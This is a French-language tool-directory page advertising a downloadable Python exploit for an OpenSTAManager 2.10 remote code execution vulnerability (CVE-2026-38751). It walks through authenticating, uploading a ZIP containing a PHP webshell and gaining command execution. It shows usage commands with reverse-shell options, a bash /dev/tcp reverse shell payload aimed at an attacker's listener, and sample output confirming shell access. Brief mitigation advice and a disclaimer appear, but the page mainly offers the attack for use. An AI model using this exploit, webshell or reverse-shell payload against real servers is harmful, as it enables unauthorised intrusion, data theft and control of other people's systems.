Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — OpenSTAManager RCE Exploit (CVE-2026-38751) | Kitploit
Outils/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceGénération de Shellcode
GitHubhackthem/openstamanager_rce_exploit-cve-2026-38751-

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

OpenSTAManager RCE Exploit (CVE-2026-38751)

Voir le dépôt
15il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE OpenSTAManager (CVE-2026-38751)

Aperçu

Ce script Python exploite une vulnérabilité d'exécution de code à distance dans OpenSTAManager version 2.10, identifiée comme CVE-2026-38751. L'exploit permet aux utilisateurs authentifiés de télécharger un module malveillant et d'exécuter des commandes arbitraires sur le système cible.

Détails de la vulnérabilité

  • ID CVE : CVE-2026-38751
  • Produit : OpenSTAManager
  • Version : 2.10
  • Type : Exécution de code à distance (RCE)
  • Vecteur d'attaque : Basé sur le Web, nécessite une authentification valide

Fonctionnement de l'exploit

L'exploit suit les étapes suivantes :

  1. Authentification : Se connecte à l'application OpenSTAManager avec les identifiants fournis
  2. Activation des mises à jour : Active la fonctionnalité de mise à jour des modules nécessaire à l'exploit
  3. Création d'un ZIP malveillant : Génère un fichier ZIP contenant :
    • Un fichier de définition de module (MODULE)
    • Un script PHP (shell.php) qui exécute des commandes via le paramètre GET
c
  • Téléchargement du module : Télécharge le ZIP malveillant via l'interface de mise à jour des modules
  • Vérification de l'exploitation : Confirme que le shell est accessible et fonctionnel
  • Exécution des commandes : Soit :
    • Mode shell interactif pour l'exécution manuelle de commandes
    • Connexion reverse shell pour établir une connexion persistante
  • Prérequis

    • Python 3.x
    • Paquets Python requis : requests, zipfile
    • Identifiants administrateur valides pour OpenSTAManager
    • Accès réseau au système cible

    Utilisation

    Utilisation de base

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password
    

    Mode shell interactif

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password --interactive
    

    Mode reverse shell

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
    

    Arguments

    ArgumentDescription
    -u, --urlURL cible (requis)
    -U, --userNom d'utilisateur pour l'authentification (requis)
    -P, --passwordMot de passe pour l'authentification (requis)
    --interactiveEntrer en mode shell interactif
    --no-cleanupNe pas supprimer les fichiers shell après exécution
    --lhostHôte local pour le reverse shell
    --lportPort local pour le reverse shell

    Détails techniques

    Processus d'exploitation

    1. Authentification : Le script effectue une requête de connexion au point de terminaison d'authentification de l'application
    2. Activation de la mise à jour des modules : Envoie une requête POST pour activer la fonctionnalité de mise à jour des modules
    3. Génération du ZIP : Crée une archive ZIP avec :
      • shell/MODULE : Fichier de configuration du module
      • shell/shell.php : Webshell PHP qui exécute des commandes passées via le paramètre GET c
    4. Processus de téléchargement : Utilise des données multipart pour télécharger le ZIP malveillant sur le point de terminaison de mise à jour des modules
    5. Vérification : Teste le shell téléchargé en exécutant une commande simple comme id pour confirmer son fonctionnement
    6. Exécution des commandes : Soit fournit un shell interactif, soit établit une connexion reverse shell

    Charges utiles utilisées

    L'exploit tente plusieurs charges utiles de reverse shell :

    • Reverse shell Bash : bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
    • Reverse shells Python utilisant des connexions socket
    • Charge utile Bash encodée en Base64
    • Reverse shell Netcat

    Considérations de sécurité

    ⚠️ Avertissement : Cet exploit est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.

    Évaluation des risques

    Cette vulnérabilité permet :

    • Une exécution arbitraire de code en tant qu'utilisateur du serveur web
    • Une possible élévation de privilèges
    • L'accès à des données sensibles stockées sur le système
    • Un éventuel mouvement latéral au sein d'un réseau

    Atténuation

    Pour se protéger contre cette vulnérabilité :

    1. Mettre à jour OpenSTAManager vers la dernière version
    2. Mettre en œuvre des contrôles d'authentification appropriés
    3. Restreindre les capacités de téléchargement de fichiers
    4. Surveiller les activités suspectes
    5. Appliquer une segmentation réseau

    Exemple de sortie

    root@kitploit:~
    [ OpenSTAManager RCE Exploit : ]
    
    Target: http://target.com
    [*] Step 1: Login...
    [+] Login successful: admin
    [*] Step 2: Enable updates...
    [+] Updates enabled
    [*] Step 3: Create ZIP...
    [*] Created in-memory ZIP file
    [*] Shell location: /modules/shell/shell.php
    [*] Step 4: Upload...
    [*] Upload status: 200
    [+] Upload successful
    [*] Step 5: Verify...
    [+] Vulnerability confirmed!
    [+] Shell: http://target.com/modules/shell/shell.php
    [+] Test: http://target.com/modules/shell/shell.php?c=whoami
    
    [*] Entering interactive mode...
    cmd> whoami
    www-data
    cmd> exit
    

    Références

    • Dépôt GitHub
    • Détails CVE

    Licence

    Cet exploit est fourni à des fins éducatives uniquement. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester est illégale.

    Télécharger l’outil